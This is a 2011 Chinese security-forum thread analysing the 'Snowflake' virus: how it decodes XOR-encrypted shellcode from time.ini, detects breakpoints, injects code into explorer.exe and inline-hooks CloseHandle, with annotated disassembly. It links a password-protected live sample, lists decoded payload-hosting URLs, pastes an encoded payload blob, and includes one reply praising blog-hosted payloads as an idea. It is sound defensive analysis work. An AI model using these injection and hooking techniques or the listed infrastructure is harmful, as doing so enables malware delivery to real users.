首页
论坛
课程
招聘
[旧帖] [原创]雪花病毒分析报告 0.00元
2011-5-21 22:16 10333

[旧帖] [原创]雪花病毒分析报告 0.00元

2011-5-21 22:16
10333
样本在2楼
发现下载要KX...郁闷..没kx的朋友到下面的链接下载吧...不要Kx看着乐呵,给留个言就成.
传送门: 猛击下载   密码和2楼的一样virus
传送门2:http://dl.dbank.com/c0euq3uewf
前言
来看雪有一阵子了,一直在看各位大大的文章,学习了很多知识,感谢看雪!今天也献上病毒分析一篇,很简单,高手直接飘过吧.
第一次发自己写的分析报告,错误肯定不少,请各位雪友指正,共同进步哈.

病毒特征
1.主程序和恶意代码分离,恶意代码以shellcode的形式加密在单独的配置文件中.
2.只能起一次危害作用.程序运行一次后恶意代码被覆盖.
内容摘要
本次分析的主要关注
病毒向explorer.exe注入恶意代码,并且inlinehook CloseHandle 使恶意代码获得执行机会
分析开始
1.整个病毒的整体流程很简单清晰:
加载time.ini,----->解码time.ini----->改写time.ini的内容----->执行time.ini中的恶意代码
流程图如下所示:


下面主要描述 time.ini的解码,以及time.ini恶意代码执行(shellcode)的过程:
1.1 time.ini解码
解码的过程就是加密数据和key1,key2做两次xor,  Key2存放在time.ini+0偏移处,也就是开始的几个字符"0x00505372", key1初始为0在每次解码的时候和解码结果做加法变换
具体流程如下图所示:


代码简单注释如下:
;time.ini的解码
00401926   > /8B4D E8               mov     ecx, dword ptr [ebp-18]
00401929   . |83C1 04               add     ecx, 4
0040192C   . |894D E8               mov     dword ptr [ebp-18], ecx
0040192F   > |8B55 E8               mov     edx, dword ptr [ebp-18]
00401932   . |3B55 E4               cmp     edx, dword ptr [ebp-1C]
00401935   . |7D 33                 jge     short 0040196A                                  ;  解密是否完成
00401937   . |8B45 08               mov     eax, dword ptr [ebp+8]
0040193A   . |0345 E8               add     eax, dword ptr [ebp-18]
0040193D   . |8B08                  mov     ecx, dword ptr [eax]
0040193F   . |894D EC               mov     dword ptr [ebp-14], ecx                         ;  获取加密数据
00401942   . |8B55 EC               mov     edx, dword ptr [ebp-14]
00401945   . |3355 F0               xor     edx, dword ptr [ebp-10]                         ;  用加密的数据和key1做xor
00401948   . |8955 EC               mov     dword ptr [ebp-14], edx
0040194B   . |8B45 EC               mov     eax, dword ptr [ebp-14]
0040194E   . |3345 F8               xor     eax, dword ptr [ebp-8]                          ;  用第一步的结果和key2做xor,key2来自time.ini+0处
00401951   . |8945 EC               mov     dword ptr [ebp-14], eax
00401954   . |8B4D F0               mov     ecx, dword ptr [ebp-10]
00401957   . |034D EC               add     ecx, dword ptr [ebp-14]                         ;  变换key1,用key1和解密数据做add
0040195A   . |894D F0               mov     dword ptr [ebp-10], ecx
0040195D   . |8B55 08               mov     edx, dword ptr [ebp+8]
00401960   . |0355 E8               add     edx, dword ptr [ebp-18]
00401963   . |8B45 EC               mov     eax, dword ptr [ebp-14]
00401966   . |8902                  mov     dword ptr [edx], eax                            ;  保存解密后的数据
00401968   .^\EB BC                 jmp     short 00401926


经过上面的解码过程time.ini中的数据已经变成可执行的shellcode.

1.2 time.ini恶意代码(shellcode)执行

1.2.1 shellcoede执行的起始位
shellcoede执行的起始位置由 time.ini+0x8处的偏移来计算,计算方法是time.ini+0xc在内存中的位置为基质加上time.ini+0x8的数据为偏移
具体代码以及简单注释如下所示:
0040150A  |.  8B4D 08               mov     ecx, dword ptr [ebp+8]
0040150D  |.  8B11                  mov     edx, dword ptr [ecx]
0040150F  |.  8955 FC               mov     dword ptr [ebp-4], edx                          ;  offset 获取shellcode开始执行的偏移 在time.ini+0x8取
00401512  |.  8B45 08               mov     eax, dword ptr [ebp+8]
00401515  |.  83C0 04               add     eax, 4                                          ;  baseaddress 获取time.ini+c偏移在内存中的位置
00401518  |.  8945 F8               mov     dword ptr [ebp-8], eax
0040151B  |.  8B4D F8               mov     ecx, dword ptr [ebp-8]
0040151E  |.  034D FC               add     ecx, dword ptr [ebp-4]                          ;  shellOEP = baseaddress+offset 通过计算或得shellcode开始执行的位置
00401521  |.  0FBE11                movsx   edx, byte ptr [ecx]
00401524  |.  83FA 55               cmp     edx, 55                                         ;  通过特征码验证shellOEP是否正确
00401527  |.  0F85 94000000         jnz     004015C1


1.2.2 shellcode后的整体流程
按照上面的偏移进入shellcode后的整体流程如下所示:


1.2.2.1 获取kernel32基质:
获取kernel32基质的方式用的是fs:0论坛前辈已经详细讲解过这里不再重复,

1.2.2.2 获取API:
病毒在获取API的时候对断点进行了检查并且对地址做了简单的处理,就是把函数地址-1这样在动态分析的时候看不到函数名字很不方便.没准还能逃避一些主防手段
还原的方式也很简单只要nop掉00C5036F  00C50375 两处的代码即可.
具体代码如下
;断点检测和地址简单处理

00C5036C    8038 CC                 cmp     byte ptr [eax], 0CC                             ; 当前获取函数是否被下断点
00C5036F    74 7F                   je      short 00C503F0
00C50371    48                      dec     eax                                             ; 获取的函数地质-1
00C50372    8038 90                 cmp     byte ptr [eax], 90                              ; 当前指向的位置是否为nop,如果不是还原地质
00C50375    74 01                   je      short 00C50378
00C50377    40                      inc     eax


1.2.2.3 遍历进程:
遍历进程寻找explorer.exe的代码很普通不多说了,

1.2.2.4 恶意代码注入explorer.exe 和 对 CloseHandle的inlinehook
找到explorer.exe后通过OpenProcess打开之,然后读取explorer.exe中CloseHandle函数的前五字节并保存,这里explorer.exe中CloseHandle函数地址直接用的自身CloseHandle的地址
因为大部分情况下不同进程kernel32.dll的基质是一样的.这个假设在这里也成立.

有了CloseHandle的位置以后就可以对 explorer.exe 的函数进行Hook了,病毒在进行Hook之前先将hook的目的函数写入了explorer.exe 并计算出了Hook点的代码

00C5C649    FF10                    call    dword ptr [eax]                                 ; ReadProcessMemory
00C5C64B    85C0                    test    eax, eax
00C5C64D    0F84 F3000000           je      00C5C746
00C5C653    8B45 D6                 mov     eax, dword ptr [ebp-2A]
00C5C656    3D 8BFF558B             cmp     eax, 8B55FF8B                                   ; 用特征值比对是否读取正确
00C5C65B    0F85 DE000000           jnz     00C5C73F
00C5C661    6A 40                   push    40
00C5C663    68 00100000             push    1000
00C5C668    68 14C80000             push    0C814
00C5C66D    6A 00                   push    0
00C5C66F    FF75 F8                 push    dword ptr [ebp-8]
00C5C672    E8 04000000             call    00C5C67B                                        ; 读取成功在explorer.exe中申请一块内存
00C5C677    E7 BD                   out     0BD, eax
00C5C679    0000                    add     byte ptr [eax], al
00C5C67B    58                      pop     eax
00C5C67C    2B00                    sub     eax, dword ptr [eax]
00C5C67E    FF10                    call    dword ptr [eax]
00C5C680    85C0                    test    eax, eax
00C5C682    0F84 BE000000           je      00C5C746
00C5C688    8945 F4                 mov     dword ptr [ebp-C], eax                          ; 保存内存地址
00C5C68B    8D45 D6                 lea     eax, dword ptr [ebp-2A]
00C5C68E    C600 E9                 mov     byte ptr [eax], 0E9
00C5C691    B9 F4C40000             mov     ecx, 0C4F4                                      ; 注入到explorer.exe部分shellcode开始执行地址偏移是个营编码值
00C5C696    034D F4                 add     ecx, dword ptr [ebp-C]                          ; 计算注入到explorer.exe后ShellCode开始执行的 内存地址
00C5C699    2B4D E4                 sub     ecx, dword ptr [ebp-1C]
00C5C69C    83E9 05                 sub     ecx, 5                                          ; 计算JMP指令的值(计算Hook点的代码)
00C5C69F    8948 01                 mov     dword ptr [eax+1], ecx
00C5C6A2    C745 EC 14C80000        mov     dword ptr [ebp-14], 0C814
00C5C6A9    C745 F0 00000000        mov     dword ptr [ebp-10], 0
00C5C6B0    C745 E8 00000000        mov     dword ptr [ebp-18], 0
00C5C6B7    837D EC 00              cmp     dword ptr [ebp-14], 0
00C5C6BB    74 42                   je      short 00C5C6FF
00C5C6BD    8D45 F0                 lea     eax, dword ptr [ebp-10]
00C5C6C0    50                      push    eax
00C5C6C1    FF75 EC                 push    dword ptr [ebp-14]
00C5C6C4    E8 04000000             call    00C5C6CD
00C5C6C9    BD C6000058             mov     ebp, 580000C6
00C5C6CE    2B00                    sub     eax, dword ptr [eax]
00C5C6D0    0345 E8                 add     eax, dword ptr [ebp-18]
00C5C6D3    50                      push    eax
00C5C6D4    8B45 F4                 mov     eax, dword ptr [ebp-C]
00C5C6D7    0345 E8                 add     eax, dword ptr [ebp-18]
00C5C6DA    50                      push    eax
00C5C6DB    FF75 F8                 push    dword ptr [ebp-8]
00C5C6DE    E8 04000000             call    00C5C6E7                                        ; 将timt.ini+0xc开始解码后的数据写入explorer.exe进程地址空间


将Shellcode写入目标进程后 病毒 Hook的目标进程 的kernel32.CloseHandle
具体代码如下:
0c0C5C719    FF10                    call    dword ptr [eax]                                 ; 修改CloseHandle处的内存读写属性
00C5C71B    85C0                    test    eax, eax
00C5C71D    74 27                   je      short 00C5C746
00C5C71F    6A 00                   push    0
00C5C721    6A 05                   push    5
00C5C723    8D45 D6                 lea     eax, dword ptr [ebp-2A]
00C5C726    50                      push    eax
00C5C727    FF75 E4                 push    dword ptr [ebp-1C]
00C5C72A    FF75 F8                 push    dword ptr [ebp-8]
00C5C72D    E8 04000000             call    00C5C736                                        ; 用上一步骤计算好的JMP指令替换CloseHandle的前5字节


经过上面ShellCode代码注入和对CloseHandle的inlineHook病毒代码已经可以在explorer.exe执行过程中或得执行的权利 ,

经过inlinehook和恶意代码注入两个步骤explorer.exe地址空间内发生了如下图所示的变化
hook前


hook后


如果explorer.exe调用CloseHandle这个API的话如下所示的恶意代码将获得执行的机会 貌似是个下载者,这里不做为重点分析

被写入的恶意shellcode

搞完收工

《0day安全 软件漏洞分析技术(第二版)》第三次再版印刷预售开始!

上传的附件:
收藏
点赞0
打赏
分享
最新回复 (82)
雪    币: 144
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
松下书童 活跃值 2011-5-21 22:25
2
0
支持楼主,顶
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-21 22:28
3
0
谢谢谢谢
忘了传附件了

2012桌面雪花.rar

解压密码:virus

上传的附件:
雪    币: 198
活跃值: 活跃值 (103)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
cooolie 活跃值 2011-5-21 22:34
4
0
这没搞完吧,里面还有东西,特别是explorer那shellcode
雪    币: 198
活跃值: 活跃值 (103)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
cooolie 活跃值 2011-5-21 22:37
5
0
内容摘要
本次分析的主要关注

囧,没注意这句话
分析的很好,特别是那排版,那 流程图很清晰很华丽
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-21 22:37
6
0
是的..亲
其实是跑到哪里就报错了....没有继续跟
注入的shellcode其实就是time.ini解码后的内容(time.ini+0x1c)
手段貌似已经没啥新花样了
看他那几个没用的API主要负载貌似是个下载者
雪    币: 580
活跃值: 活跃值 (50)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
hkfans 活跃值 3 2011-5-21 22:47
7
0
楼主的ID是不是想取 wParam啊,呵呵
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-21 22:50
8
0
嘿嘿嘿嘿嘿嘿嘿嘿嘿
svch0st.exe

好细心啊.....亲
雪    币: 297
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
enze 活跃值 2011-5-21 22:52
9
0
作者还给出的几个博客地址。。。。。 貌似还对杀软做了统计
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-21 22:55
10
0
传说中 作者是个小学生.....
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-22 18:59
11
0
谢谢谢谢
雪    币: 410
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
幻影火 活跃值 2011-5-22 19:18
12
0
呵呵,這種病毒,我好像也有,最近小弟也遇到不少很像這種的病毒,不過都懶得分析精準,因為一方面它是一語言寫的,還有就是要解除他的方法很麻煩,不然我這裡倒是挺多那種奇奇怪怪的病毒樣本,呵呵呵呵。
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-23 22:03
13
0
呵呵:)可以考虑使用虚拟机调试这样就不怕难清除了。
雪    币: 8234
活跃值: 活跃值 (120)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
xJJuno 活跃值 2011-5-23 23:33
14
0
很详细。。。。。。
雪    币: 255
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
seaver 活跃值 2011-5-24 10:48
15
0
在哪?没看到?
雪    币: 14
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
yamidie 活跃值 2011-5-24 17:33
16
0
过不了主动这病毒! 小孩玩玩
雪    币: 1776
活跃值: 活跃值 (109)
能力值: ( LV12,RANK:480 )
在线值:
发帖
回帖
粉丝
熊猫正正 活跃值 9 2011-5-24 17:44
17
0
谢谢分享~~
雪    币: 5
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
迪恩 活跃值 2011-5-25 00:28
18
0
其实,我对驱动比较有好奇。
雪    币: 1476
活跃值: 活跃值 (101)
能力值: ( LV3,RANK:35 )
在线值:
发帖
回帖
粉丝
z许 活跃值 2011-5-25 08:49
19
0


膜拜楼主。学习了。。。。
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-25 16:37
20
0
帅哥,你来珠海了?
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-26 11:07
21
0
的确过不了
但是能有8-10W的感染量还是有些可取之处的,比如恶意代码和主程序的分离
传说中作者的确是个小盆友10多岁的小朋友
雪    币: 1776
活跃值: 活跃值 (109)
能力值: ( LV12,RANK:480 )
在线值:
发帖
回帖
粉丝
熊猫正正 活跃值 9 2011-5-26 15:18
22
0
咱不是帅锅,嘿嘿~~

嗯,来珠海了,以后还要多向您学习,嘿嘿~~
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-26 17:00
23
0
珠海现在太潮湿了....坚持住啊
额..还是共同进步吧..我是菜鸟一只....
雪    币: 1115
活跃值: 活跃值 (12)
能力值: ( LV12,RANK:230 )
在线值:
发帖
回帖
粉丝
pencil 活跃值 5 2011-5-26 17:57
24
0
跟主防较什么劲。达到目的就好。

现在只是文件撑大了,他要是再弄个变形引擎。。
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-26 18:07
25
0
惊现老毕
杀软最好能先压缩再上传.这样那些撑大的文件就SX了..不知道可行否.
雪    币: 410
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
幻影火 活跃值 2011-5-26 18:13
26
0
呵呵,我都是用虛擬機,但是我每次虛擬機中毒我就想辦法將她解開,呵呵,畢竟重灌不是萬能的
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-26 18:22
27
0
哈这样也好,能学习更多的东西,
只要搞清楚病毒的行为,杀掉也不困难
VM镜像快照的功能很强大.
雪    币: 0
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
泽兰烽火 活跃值 2011-5-26 18:24
28
0
楼主V5了。。。
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-26 18:33
29
0
啊 惊现处女贴...
我好快乐啊
雪    币: 416
活跃值: 活跃值 (13)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
guobing 活跃值 2011-5-27 00:13
30
0
http://s21.cnzz.com/stat.php?id=2955370
不懂得路过,,。
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-27 11:32
31
0
走好走好...那个url是啥
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-28 10:49
32
0
谢谢谢谢.....
雪    币: 17
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
cpe 活跃值 2011-5-29 16:59
33
0
分析的很清晰
雪    币: 992
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
天绝弑杀 活跃值 2011-5-29 17:27
34
0
楼主很强大,顶~~~~~
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-30 18:15
35
0
谢谢鼓励....
还不够详细
雪    币: 20
活跃值: 活跃值 (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
破九 活跃值 2011-5-30 18:30
36
0
LZ好厉害 向你学习ing
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-5-31 19:04
37
0
不要顶 不要顶...共同进步共同进步...
雪    币: 32
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
waqs 活跃值 2011-6-1 11:20
38
0
强啊 眼中的高手 菜鸟膜拜一下
雪    币: 365
活跃值: 活跃值 (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
zycxy 活跃值 2011-6-1 17:11
39
0
那几个博客,都有几万的访问量。
雪    币: 13
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
dangliang 活跃值 2011-6-1 17:20
40
0
几个博客地址会不会是一个配置文件呢?
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-6-1 17:30
41
0
解码后发现
http://home.51.com/lost9588/diary/item/10048758.html
http://blog.myspace.cn/e/408832029.htm
http://hi.baidu.com/lost9588/blog/item/20a492c74e73f31693457e61.html
http://blog.sina.com.cn/s/blog_77f2bba40100prro.htm
http://home.51.com/jocb9588/diary/item/10047140.html
http://www.fnsorfnfgsajr.com/sky123.htm
http://www.kiuuhfgasefsfr.com/sky123.htm
这些blog
现在恶意代码是放在time.ini中的,如果加恶意代码加密放在这些Blog上也是个不错的思路哈哈
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-6-1 17:36
42
0
第一个blog貌似有百万的访问量了,这毒貌似出变种了....
雪    币: 13
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
dangliang 活跃值 2011-6-2 09:26
43
0
博客内容差不多是这种格式:
########OLAAAAAACCBDMBDEACIAAAMAAAAAAAAAHPAAAAABHCHCAAAALAAEAAAAAAAAEAAGAAAAAAAIHCGBHCGFHIHECOGEGMGMHMFGGPGEGOGFHECOGEGMGMHMEDGMGJGFGOHEEBFAEJCOGEGMGMHMHAHCGPGDGEGMGMCOGEGMGMHMECEGFEGIHFGNGCHDCOGEGMGMHMEIGBGPFKGJHAEFHIHECOGEGMGMAAAAAAAAAAAAAAAAAAAAIAOODGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAGAAAAIAAMAAAAAAAAEOGBLMAAAAAAAAAAAAADAAAAIAAAAAAAAAAAAAAAAACGCHAHKGCECIAIAAKIGIAAAAFAFAEGGMGBGHAAFAFAECGBGDGLAAGIHEHEHADKCPCPHKGDDADADBDCDGCOHFDADDCOGOGFHEGKHDHACOGDGPGNCPFAFAFPDFDDDEDFDGDECOHKGJHAAAAA
不知道解密之后会是啥。
雪    币: 28
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
皓朗天空 活跃值 2011-6-2 12:51
44
0
不明白
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-6-2 13:09
45
0
.....又是处女贴...哪里不明白...愿意和你共同进步...
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-6-2 22:15
46
0
应该不是 解码算法在1.1有描述,纯字符的shellcode编写也有难度..
雪    币: 0
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
chesion 活跃值 2011-6-2 23:23
47
0
支持楼主。。用力的定
雪    币: 26
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
飘逸剑客 活跃值 2011-6-3 00:43
48
0
楼主确实很厉害啊!!!!!!!
雪    币: 69
活跃值: 活跃值 (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
wParma 活跃值 1 2011-6-3 18:32
49
0
谢谢 谢谢
雪    币: 220
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
广海混沌 活跃值 2011-6-3 18:41
50
0
恩 清晰。。。。。。。。。。。
游客
登录 | 注册 方可回帖
返回